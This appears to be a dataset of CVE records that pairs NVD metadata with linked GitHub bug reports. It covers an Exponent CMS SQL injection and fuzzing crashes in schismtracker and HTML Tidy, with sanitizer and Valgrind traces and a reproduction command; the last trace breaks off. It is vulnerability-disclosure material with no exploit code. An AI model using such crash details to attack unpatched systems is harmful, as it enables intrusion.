0x0c667fffb120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c667fffb130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c667fffb140: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c667fffb150: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==165186==ABORTING
``` | Heap-based buffer overflow (READ of size 8) in the fmt_mtm_load_song() function | https://api.github.com/repos/schismtracker/schismtracker/issues/249/comments | 1 | 2021-04-06T21:10:49Z | 2021-04-06T21:56:51Z | https://github.com/schismtracker/schismtracker/issues/249 | 851,813,307 | 249 | 4,738 |
CVE-2021-32441 | 2023-02-17T18:15:11.023 | SQL Injection vulnerability in Exponent-CMS v.2.6.0 fixed in 2.7.0 allows attackers to gain access to sensitive information via the selectValue function in the expConfig class. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Patch"
],
"url": "https://github.com/exponentcms/exponent-cms/issues/1542"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/pang0lin/CVEproject/blob/main/ExponentCMS_v2.6.0_sqli.md"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Patch"
],
"url": "https://github.com/exponentcms/exponent-cms/issues/1542"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/pang0lin/CVEproject/blob/main/ExponentCMS_v2.6.0_sqli.md"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:exponentcms:exponent_cms:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5F6AF30A-A579-4DD1-BE30-4E5A3F40AA33",
"versionEndExcluding": "2.7.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.6.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/exponentcms/exponent-cms/issues/1542 | [
"Issue Tracking",
"Patch"
] | github.com | [
"exponentcms",
"exponent-cms"
] | I found an unauthticate sql injection for ExponentCMS v2.6.0 (the latest version at this time), for more details.
[https://github.com/pang0lin/CVEproject/blob/main/ExponentCMS_v2.6.0_sqli.md](url) | ExponentCMS v2.6.0 unauthticate sql injection | https://api.github.com/repos/exponentcms/exponent-cms/issues/1542/comments | 3 | 2021-05-06T02:56:58Z | 2021-05-08T15:49:40Z | https://github.com/exponentcms/exponent-cms/issues/1542 | 877,024,698 | 1,542 | 4,739 |
CVE-2021-33391 | 2023-02-17T18:15:11.187 | An issue in HTACG HTML Tidy v5.7.28 allows attacker to execute arbitrary code via the -g option of the CleanNode() function in gdoc.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch"
],
"url": "https://github.com/htacg/tidy-html5/issues/946"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch"
],
"url": "https://github.com/htacg/tidy-html5/issues/946"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:htacg:tidy:5.7.28:*:*:*:*:*:*:*",
"matchCriteriaId": "D289D868-9979-445D-A7DB-9DFE4D27DF15",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*",
"matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
] | [
"416"
] | 416 | https://github.com/htacg/tidy-html5/issues/946 | [
"Exploit",
"Patch"
] | github.com | [
"htacg",
"tidy-html5"
] | Hi team,
While fuzzing the latest release HTML Tidy for Linux version 5.7.28 ( and also git commit: f6376f82c8d75a2b88d0860497ae39a150ef97e4 HTML Tidy for Linux version 5.7.47), I found the heap use-after-free issue in CleanNode() in gdoc.c
Attaching a reproducer (gzipped so GitHub accepts it): [test.html.gz](https://github.com/htacg/tidy-html5/files/6428896/test.html.gz)
Issue triggers only with the option `-gdoc, -g` and can be reproduced by running
`tidy -g test.html`
OS Version:
```
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=20.04
DISTRIB_CODENAME=focal
DISTRIB_DESCRIPTION="Ubuntu 20.04.2 LTS"
```
```
=================================================================
==1751866==ERROR: AddressSanitizer: heap-use-after-free on address 0x60b000001f68 at pc 0x0000004fc8f9 bp 0x7fff2db367d0 sp 0x7fff2db367c8
READ of size 8 at 0x60b000001f68 thread T0
#0 0x4fc8f8 in CleanNode /home/bsdboy/projects/tidy-html5-5.7.28/src/gdoc.c:111:21
#1 0x4fc5a8 in prvTidyCleanGoogleDocument /home/bsdboy/projects/tidy-html5-5.7.28/src/gdoc.c:168:5
#2 0x4f6c97 in tidyDocCleanAndRepair /home/bsdboy/projects/tidy-html5-5.7.28/src/tidylib.c:2086:9
#3 0x4f67e7 in tidyCleanAndRepair /home/bsdboy/projects/tidy-html5-5.7.28/src/tidylib.c:1414:14
#4 0x4d36e2 in main /home/bsdboy/projects/tidy-html5-5.7.28/console/tidy.c:2517:22
#5 0x7f675d28f0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#6 0x42537d in _start (/home/bsdboy/projects/tidy-html5-5.7.28/build-compile/tidy+0x42537d)
0x60b000001f68 is located 56 bytes inside of 104-byte region [0x60b000001f30,0x60b000001f98)
freed by thread T0 here:
#0 0x4a0372 in free (/home/bsdboy/projects/tidy-html5-5.7.28/build-compile/tidy+0x4a0372)
#1 0x5875b5 in defaultFree /home/bsdboy/projects/tidy-html5-5.7.28/src/alloc.c:104:13
#2 0x53fb9e in prvTidyFreeNode /home/bsdboy/projects/tidy-html5-5.7.28/src/lexer.c:1558:13
#3 0x516fd9 in prvTidyDiscardElement /home/bsdboy/projects/tidy-html5-5.7.28/src/parser.c:127:9
#4 0x4fc8bb in CleanNode /home/bsdboy/projects/tidy-html5-5.7.28/src/gdoc.c:110:21
#5 0x4fc5a8 in prvTidyCleanGoogleDocument /home/bsdboy/projects/tidy-html5-5.7.28/src/gdoc.c:168:5
#6 0x4f6c97 in tidyDocCleanAndRepair /home/bsdboy/projects/tidy-html5-5.7.28/src/tidylib.c:2086:9
#7 0x4f67e7 in tidyCleanAndRepair /home/bsdboy/projects/tidy-html5-5.7.28/src/tidylib.c:1414:14
#8 0x4d36e2 in main /home/bsdboy/projects/tidy-html5-5.7.28/console/tidy.c:2517:22
#9 0x7f675d28f0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
previously allocated by thread T0 here:
#0 0x4a05dd in malloc (/home/bsdboy/projects/tidy-html5-5.7.28/build-compile/tidy+0x4a05dd)
#1 0x58746e in defaultAlloc /home/bsdboy/projects/tidy-html5-5.7.28/src/alloc.c:64:45
#2 0x54064b in prvTidyNewNode /home/bsdboy/projects/tidy-html5-5.7.28/src/lexer.c:1430:26
#3 0x554a2a in TagToken /home/bsdboy/projects/tidy-html5-5.7.28/src/lexer.c:1597:18
#4 0x54be82 in GetTokenFromStream /home/bsdboy/projects/tidy-html5-5.7.28/src/lexer.c:2888:32
#5 0x546726 in prvTidyGetToken /home/bsdboy/projects/tidy-html5-5.7.28/src/lexer.c:2507:12
#6 0x51f592 in prvTidyParseNamespace /home/bsdboy/projects/tidy-html5-5.7.28/src/parser.c:1429:20
#7 0x51f2e9 in ParseTag /home/bsdboy/projects/tidy-html5-5.7.28/src/parser.c:712:5
#8 0x51cad9 in prvTidyParseBlock /home/bsdboy/projects/tidy-html5-5.7.28/src/parser.c:1316:13
#9 0x51f2e9 in ParseTag /home/bsdboy/projects/tidy-html5-5.7.28/src/parser.c:712:5
#10 0x53118b in prvTidyParseBody /home/bsdboy/projects/tidy-html5-5.7.28/src/parser.c:4045:13
#11 0x51f2e9 in ParseTag /home/bsdboy/projects/tidy-html5-5.7.28/src/parser.c:712:5
#12 0x533642 in prvTidyParseHTML /home/bsdboy/projects/tidy-html5-5.7.28/src/parser.c:4465:5
#13 0x533fbc in prvTidyParseDocument /home/bsdboy/projects/tidy-html5-5.7.28/src/parser.c:4713:9
#14 0x4f7e51 in prvTidyDocParseStream /home/bsdboy/projects/tidy-html5-5.7.28/src/tidylib.c:1500:9
#15 0x4f52d4 in tidyDocParseFile /home/bsdboy/projects/tidy-html5-5.7.28/src/tidylib.c:1170:18
#16 0x4f4eb4 in tidyParseFile /home/bsdboy/projects/tidy-html5-5.7.28/src/tidylib.c:1105:12
#17 0x4d369b in main /home/bsdboy/projects/tidy-html5-5.7.28/console/tidy.c:2508:22
#18 0x7f675d28f0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
SUMMARY: AddressSanitizer: heap-use-after-free /home/bsdboy/projects/tidy-html5-5.7.28/src/gdoc.c:111:21 in CleanNode
Shadow bytes around the buggy address:
0x0c167fff8390: fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa
0x0c167fff83a0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
0x0c167fff83b0: 00 fa fa fa fa fa fa fa fa fa 00 00 00 00 00 00
0x0c167fff83c0: 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa
0x0c167fff83d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa
=>0x0c167fff83e0: fa fa fa fa fa fa fd fd fd fd fd fd fd[fd]fd fd
0x0c167fff83f0: fd fd fd fa fa fa fa fa fa fa fa fa fd fd fd fd
0x0c167fff8400: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa
0x0c167fff8410: fa fa fd fd fd fd fd fd fd fd fd fd fd fd fd fa
0x0c167fff8420: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c167fff8430: 00 00 00 00 00 fa fa fa fa fa fa fa fa fa 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==1751866==ABORTING
```
Valgrind memcheck report:
```
==1752197== Memcheck, a memory error detector
==1752197== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al.
==1752197== Using Valgrind-3.15.0 and LibVEX; rerun with -h for copyright info
==1752197== Command: ./tidy -g test.html
==1752197==
line 1 column 1 - Warning: discarding malformed <!DOCTYPE>
line 1 column 26 - Warning: replacing invalid UTF-8 bytes (char. code U+00A5)
line 1 column 27 - Warning: replacing invalid UTF-8 bytes (char. code U+009F)
line 1 column 32 - Warning: replacing invalid UTF-8 bytes (char. code U+008D)
line 1 column 33 - Warning: replacing invalid UTF-8 bytes (char. code U+008D)
line 1 column 20 - Warning: <div> attribute name "i��ioz{��~" (value="la") is invalid
line 1 column 33 - Warning: inserting implicit <body>
line 1 column 41 - Warning: <svg> attribute with missing trailing quote mark
line 1 column 56 - Warning: <br> attribute "!doctype" lacks value
line 1 column 114 - Warning: replacing invalid UTF-8 bytes (char. code U+0080)
line 1 column 216 - Warning: <meta> attribute with missing trailing quote mark
line 1 column 216 - Warning: <meta> attribute with missing trailing quote mark
line 1 column 318 - Warning: missing </br> before <br>
line 1 column 216 - Warning: missing </meta> before <br>
line 1 column 148 - Warning: missing </meta> before <meta>
line 1 column 142 - Warning: missing </head> before <meta>
line 1 column 74 - Warning: missing </html> before <head>
line 1 column 56 - Warning: missing </br> before <html>
line 1 column 41 - Warning: missing </svg> before <br>
line 1 column 20 - Warning: missing </div> before <svg>
line 1 column 403 - Warning: <ttype> unexpected or duplicate quote mark
line 1 column 500 - Warning: replacing invalid UTF-8 bytes (char. code U+0083)
line 1 column 513 - Warning: replacing invalid UTF-8 bytes (char. code U+0000)
line 1 column 578 - Warning: replacing invalid UTF-8 bytes (char. code U+0091)
line 2 column 114 - Warning: <input> attribute with missing trailing quote mark
line 2 column 156 - Warning: replacing invalid UTF-8 bytes (char. code U+0080)
line 2 column 168 - Warning: replacing invalid UTF-8 bytes (char. code U+008D)
line 2 column 169 - Warning: replacing invalid UTF-8 bytes (char. code U+008D)
line 2 column 25 - Warning: missing </input> before <input>
line 1 column 581 - Warning: missing </input> before <input>
line 1 column 536 - Warning: missing </input> before <input>
line 1 column 403 - Warning: missing </ttype> before <input>
line 1 column 364 - Warning: missing </table> before <ttype>
line 1 column 332 - Warning: missing </worm> before <table>
line 1 column 33 - Warning: missing </body> before <worm>
line 1 column 1 - Warning: missing </html> before <body>
line 2 column 193 - Warning: replacing invalid UTF-8 bytes (char. code U+0091)
line 2 column 177 - Warning: discarding unexpected </html>
line 2 column 1448 - Warning: <meta> attribute "conten/body" lacks value
line 2 column 1466 - Warning: discarding unexpected </html>
line 2 column 1515 - Warning: <meta> attribute with missing trailing quote mark
line 2 column 1596 - Warning: discarding unexpected </title6>
line 2 column 1709 - Warning: replacing invalid UTF-8 bytes (char. code U+00FF)
line 2 column 2542 - Warning: replacing invalid UTF-8 bytes (char. code U+00B5)
line 2 column 2909 - Warning: replacing invalid UTF-8 bytes (char. code U+0005)
line 4 column 49 - Warning: unescaped & or unknown entity "&ei"
line 4 column 61 - Warning: unescaped & or unknown entity "&ei"
line 4 column 86 - Warning: unescaped & or unknown entity "&lei"
line 4 column 110 - Warning: unescaped & or unknown entity "&lei"
line 4 column 129 - Warning: unescaped & or unknown entity "&window._cshid"
line 4 column 144 - Warning: unescaped & or unknown entity "&-1"
line 4 column 159 - Warning: unescaped & or unknown entity "&cshid"
line 4 column 184 - Warning: unescaped & or unknown entity "&cshid"
line 4 column 240 - Warning: unescaped & or unknown entity "&ct"
line 4 column 246 - Warning: replacing invalid UTF-8 bytes (char. code U+00FF)
line 4 column 247 - Warning: replacing invalid UTF-8 bytes (char. code U+00FF)
line 4 column 249 - Warning: unescaped & or unknown entity "&cad"
line 4 column 261 - Warning: unescaped & or unknown entity "&zx"
line 4 column 346 - Warning: unescaped & or unknown entity "&google.ml"
line 4 column 619 - Warning: replacing invalid UTF-8 bytes (char. code U+001D)
line 4 column 619 - Warning: <area> attribute "(a)*a;l" lacks value
line 4 column 632 - Warning: replacing invalid UTF-8 bytes (char. code U+00FF)
line 4 column 633 - Warning: replacing invalid UTF-8 bytes (char. code U+00FF)
line 4 column 619 - Warning: <area> attribute "h(ao��widte" lacks value
line 4 column 619 - Warning: <area> attribute name "h[e]};a.src" (value="c}};google.logUrl=m;}).call(thi);(function(){") is invalid
line 5 column 25 - Warning: replacing invalid UTF-8 bytes (char. code U+0010)
line 4 column 619 - Info: value for attribute "google.y" missing quote marks
line 4 column 619 - Info: value for attribute "c" missing quote marks
line 4 column 619 - Info: value for attribute "c" missing quote marks
line 4 column 619 - Warning: <area> attribute "document.documentelement.addeventlistener("submit",function(b){var" lacks value
line 4 column 619 - Warning: <area> attribute name "a;if(a" (value="b.target){var") is invalid
line 6 column 184 - Warning: replacing invalid UTF-8 bytes (char. code U+00FF)
line 6 column 185 - Warning: replacing invalid UTF-8 bytes (char. code U+00FF)
line 6 column 186 - Warning: replacing invalid UTF-8 bytes (char. code U+00FF)
line 6 column 187 - Warning: replacing invalid UTF-8 bytes (char. code U+008D)
line 4 column 619 - Info: value for attribute "c" missing quote marks
line 6 column 321 - Warning: unescaped & or unknown entity "&a"
line 4 column 619 - Warning: <area> attribute name "ion())},!0);document.documentelement.addeventlistener("click",function(b){var0a;a:{for(a" (value="b.target;a&&a!=document.documentElement;a=a.parentElement)if("A"==a.tagName){a="1"==a.getAttribute("data-nohref");break") is invalid
line 6 column 439 - Warning: unescaped & or unknown entity "&b.preventDefault"
line 4 column 619 - Warning: <area> missing '>' for end of tag
line 4 column 619 - Warning: <area> attribute name "a}a" (value="!1}a&&b.preventDefault()},!0);}).call(this);") is invalid
line 4 column 619 - Warning: <area> dropping value "a.id;else{do" for repeated attribute "c"
line 4 column 619 - Warning: <area> dropping value "Math.random();while(google.y[c])}google.y[c]=[a,b];return!1};google.sx=f64,1960,718,530,2,61,174,44unction(a){google.sy.push(a)};google.lm=[];google.plm=function(a){google.lm.push.apply(google.lm,a)};google.lq=[];google.load=function(a,b,c){google.lq.push([[a],b,c])};google.loadAll=function(a,b){google.lq.push([a,b])};google.bx=!1;google.lx=function(){};}).call(this);google.f={};(function(){" for repeated attribute "c"
line 2 column 1583 - Warning: missing </title> before <area>
line 2 column 1515 - Warning: missing </meta> before <title>
line 2 column 1448 - Warning: missing </meta> before <meta>
line 2 column 1442 - Warning: missing </head> before <meta>
line 2 column 275 - Warning: missing </script> before <head>
line 7 column 1034 - Warning: replacing invalid UTF-8 bytes (char. code U+00BC)
line 7 column 1137 - Warning: discarding unexpected </head>
line 8 column 23 - Warning: unescaped & or unknown entity "&document.f.q.focus"
line 8 column 59 - Warning: unescaped & or unknown entity "&document.gbqf.q.focus"
line 10 column 30 - Info: value for attribute "id" missing quote marks
line 10 column 49 - Info: value for attribute "class" missing quote marks
line 10 column 73 - Info: value for attribute "class" missing quote marks
line 10 column 127 - Warning: unescaped & or unknown entity "&tab"
line 10 column 147 - Info: value for attribute "class" missing quote marks
line 10 column 201 - Warning: unescaped & or unknown entity "&tab"
line 10 column 219 - Info: value for attribute "class" missing quote marks
line 10 column 268 - Warning: unescaped & or unknown entity "&tab"
line 10 column 286 - Info: value for attribute "class" missing quote marks
line 10 column 334 - Warning: unescaped & or unknown entity "&tab"
line 10 column 355 - Info: value for attribute "class" missing quote marks
line 10 column 416 - Info: value for attribute "class" missing quote marks
line 10 column 483 - Info: value for attribute "class" missing quote marks
line 10 column 546 - Info: value for attribute "class" missing quote marks
line 10 column 686 - Info: value for attribute "id" missing quote marks
line 10 column 686 - Info: value for attribute "width" missing quote marks
line 10 column 717 - Info: value for attribute "id" missing quote marks
line 10 column 717 - Info: value for attribute "class" missing quote marks
line 10 column 747 - Info: value for attribute "id" missing quote marks
line 10 column 747 - Info: value for attribute "class" missing quote marks
line 10 column 777 - Info: value for attribute "id" missing quote marks
line 10 column 797 - Info: value for attribute "class" missing quote marks
line 10 column 880 - Info: value for attribute "class" missing quote marks
line 10 column 935 - Info: value for attribute "target" missing quote marks
line 10 column 935 - Info: value for attribute "id" missing quote marks
line 10 column 1011 - Warning: unescaped & or unknown entity "&passive"
line 10 column 1024 - Warning: unescaped & or unknown entity "&continue"
line 10 column 1056 - Warning: unescaped & or unknown entity "&ec"
line 10 column 935 - Info: value for attribute "class" missing quote marks
line 10 column 1102 - Info: value for attribute "class" missing quote marks
line 10 column 1102 - Info: value for attribute "style" missing quote marks
line 10 column 1136 - Info: value for attribute "class" missing quote marks
line 10 column 1136 - Info: value for attribute "style" missing quote marks
line 10 column 1391 - Warning: missing </br> before <br>
line 10 column 1225 - Warning: missing </img> before <br>
line 10 column 1211 - Warning: missing </div> before <img>
line 10 column 1493 - Info: value for attribute "width" missing quote marks
line 10 column 1753 - Warning: missing </dlv> before <input>
line 10 column 1721 - Warning: missing </input> before <dlv>
line 10 column 1689 - Warning: missing </input> before <input>
line 10 column 1643 - Warning: missing </input> before <input>
line 10 column 1598 - Warning: missing </input> before <input>
line 10 column 1548 - Warning: missing </input> before <input>
line 10 column 1519 - Warning: missing </td> before <input>
line 10 column 1476 - Warning: missing </tr> before <td>
line 10 column 1437 - Warning: missing </table> before <tr>
line 10 column 1405 - Warning: missing </form> before <table>
line 10 column 1185 - Warning: missing </br> before <form>
line 10 column 1177 - Warning: missing </center> before <br>
line 10 column 15 - Warning: missing </div> before <center>
line 10 column 2025 - Warning: missing </span> before <input>
line 10 column 2161 - Warning: missing </input> before <input>
line 10 column 2142 - Warning: missing </span> before <input>
line 11 column 149 - Warning: discarding unexpected </td>
line 11 column 155 - Warning: replacing invalid UTF-8 bytes (char. code U+00FF)
line 11 column 156 - Warning: replacing invalid UTF-8 bytes (char. code U+00FF)
line 11 column 277 - Warning: discarding unexpected </td>
line 11 column 282 - Warning: discarding unexpected </tr>
line 11 column 287 - Warning: discarding unexpected </table>
line 12 column 25 - Warning: unescaped & or unknown entity "&document.getElementById"
line 1 column 20 - Warning: missing </div>
line 1 column 20 - Warning: missing </div>
line 1 column 33 - Warning: inserting missing 'title' element
line 4 column 619 - Warning: <area> lacks "alt" attribute
line 4 column 619 - Warning: <area> lacks "href" attribute
line 10 column 1225 - Warning: <img> lacks "alt" attribute
line 10 column 1225 - Warning: <img> lacks "src" attribute
line 10 column 717 - Warning: trimming empty <span>
line 10 column 747 - Warning: trimming empty <span>
line 10 column 777 - Warning: trimming empty <span>
==1752197== Invalid read of size 8
==1752197== at 0x41D28B: CleanNode (src/gdoc.c:111)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4b8b068 is 56 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D29A: CleanNode (src/gdoc.c:111)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4b8b068 is 56 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D2D7: CleanNode (src/gdoc.c:113)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4b8b068 is 56 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
==1752197== by 0x43469D: prvTidyFreeNode (src/lexer.c:1558)
==1752197== by 0x425424: prvTidyDiscardElement (src/parser.c:127)
==1752197== by 0x41D27B: CleanNode (src/gdoc.c:110)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Block was alloc'd at
==1752197== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44ABCE: defaultAlloc (src/alloc.c:64)
==1752197== by 0x4348C4: prvTidyNewNode (src/lexer.c:1430)
==1752197== by 0x439B3E: TagToken (src/lexer.c:1597)
==1752197== by 0x437DF7: GetTokenFromStream (src/lexer.c:2888)
==1752197== by 0x436AF5: prvTidyGetToken (src/lexer.c:2507)
==1752197== by 0x427BB3: prvTidyParseNamespace (src/parser.c:1429)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x426EA0: prvTidyParseBlock (src/parser.c:1316)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197== by 0x42D4B9: prvTidyParseBody (src/parser.c:4045)
==1752197== by 0x427B48: ParseTag (src/parser.c:712)
==1752197==
==1752197== Invalid read of size 8
==1752197== at 0x41D2E6: CleanNode (src/gdoc.c:113)
==1752197== by 0x41D1D8: prvTidyCleanGoogleDocument (src/gdoc.c:168)
==1752197== by 0x41AEA9: tidyDocCleanAndRepair (src/tidylib.c:2086)
==1752197== by 0x41ACD7: tidyCleanAndRepair (src/tidylib.c:1414)
==1752197== by 0x40C7B0: main (console/tidy.c:2517)
==1752197== Address 0x4b8b068 is 56 bytes inside a block of size 104 free'd
==1752197== at 0x483CA3F: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1752197== by 0x44AD05: defaultFree (src/alloc.c:104)
